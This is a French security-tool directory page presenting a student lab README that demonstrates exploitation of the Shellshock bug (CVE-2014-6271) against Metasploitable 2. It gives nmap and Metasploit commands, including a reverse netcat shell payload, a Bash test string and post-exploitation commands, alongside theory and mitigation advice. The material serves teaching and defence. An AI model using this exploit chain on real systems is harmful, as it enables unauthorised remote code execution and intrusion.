Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Shellshock-CVE-2014-6271-Exploitation-and-Analysis — # Laboratoire pédagogique démontrant l'exploitation de Shellshock (CVE-2014-6271) avec Metasploit contre Metasploitable 2, incluant le scan, l'exploitation, le reverse shell et les stratégies d'atténuation. | Kitploit
Outils/GitHubGitHub/rajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubrajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis

Shellshock-CVE-2014-6271-Exploitation-and-Analysis

# Laboratoire pédagogique démontrant l'exploitation de Shellshock (CVE-2014-6271) avec Metasploit contre Metasploitable 2, incluant le scan, l'exploitation, le reverse shell et les stratégies d'atténuation.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🐚 Shellshock (CVE-2014-6271) – Exploitation et Analyse

📌 Aperçu

Il s'agit du devoir pratique pour Vulnerability Assessment and Penetration Testing – II, axé sur l'exploitation et l'analyse de la vulnérabilité Shellshock (CVE-2014-6271).
Réalisé dans un environnement de laboratoire contrôlé utilisant Metasploitable 2 (cible) et Kali Linux (attaquant).


🛠 Outils utilisés

  • 💻 Kali Linux – Machine attaquante
  • 🖥 Metasploitable 2 – Cible vulnérable
  • 🔍 Nmap – Scan et détection de services
  • 🎯 Metasploit Framework – Exploitation

🔍 Résumé de la vulnérabilité

  • Type : Exécution de code à distance (RCE)
  • Composant affecté : GNU Bash (versions 1.14–4.3)
  • Impact : Exécution de commandes arbitraires via des variables d'environnement spécialement conçues
  • Score CVSS : 10.0 (Critique)
  • Vecteur d'exploitation : Souvent via les en-têtes HTTP vers les scripts CGI

⚡ Étapes du laboratoire

1️⃣ Scanner la cible

root@kitploit:~
 nmap -sS -sV <target-ip>

2️⃣ Démarrer Metasploit msfconsole

3️⃣ Charger le module d'exploitation use exploit/multi/http/apache_mod_cgi_bash_env_exec

4️⃣ Configurer l'exploitation

root@kitploit:~
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat

5️⃣ Lancer l'exploitation exploit

📸 La démonstration inclut

root@kitploit:~
📡 Résultats du scan Nmap

⚙️ Configuration de Metasploit

🔄 Sortie de session de shell inversé

🛠 Commandes post-exploitation :

whoami
uname -a
ifconfig

📖 Contexte théorique

Qu'est-ce que Shellshock ?

Shellshock est une vulnérabilité du shell GNU Bash qui permet aux attaquants d'exécuter des commandes arbitraires en les injectant dans les variables d'environnement. Découverte en septembre 2014 et identifiée sous le CVE-2014-6271, elle affecte Bash v1.14 à v4.3.

Comment ça marche ?

Bash traite incorrectement les définitions de fonctions dans les variables d'environnement et exécute des commandes supplémentaires après le corps de la fonction. Sur les serveurs Web utilisant des scripts CGI, les en-têtes HTTP deviennent des variables d'environnement, créant une voie d'attaque facile.

Exemple :

root@kitploit:~
env x='() { :;}; echo vulnerable' bash -c "echo test"

Si vulnérable, il affiche vulnerable.

Impact :

  • Exécution de code à distance (RCE) complète sans authentification
  • Exploitable via de simples requêtes HTTP
  • Utilisé dans les botnets, vers, attaques ciblées
  • A affecté des millions de serveurs, routeurs et appareils IoT

Exploits réels

  • Serveurs Yahoo – Malware via scripts CGI
  • Botnet Wopbot – Exploitation automatisée
  • QNAP NAS – Accès shell distant et malware
  • Vers auto-réplicants – Propagation vers de nouveaux hôtes vulnérables

🛡 Prévention et atténuation

  • 🔄 Mettre à jour Bash immédiatement
  • 🚫 Désactiver les scripts CGI inutilisés
  • 🔥 Utiliser des pare-feu pour bloquer le trafic inutile
  • 🛡 Déployer des pare-feu d'applications Web (WAF)
  • 📜 Surveiller les journaux de requêtes HTTP
  • 👤 Appliquer les principes du moindre privilège

⚠️ Avertissement

Ce projet est uniquement à des fins éducatives.
Tous les tests ont été effectués dans un environnement de laboratoire contrôlé.
❌ N'utilisez PAS ces techniques sur des systèmes sans autorisation.

👨‍💻 Auteur : Janith Madhusankha
🎓 Cours : BICT (Hons) en Réseau et Sécurité
🏫 Institution : South Eastern University of Sri Lanka

Télécharger l’outil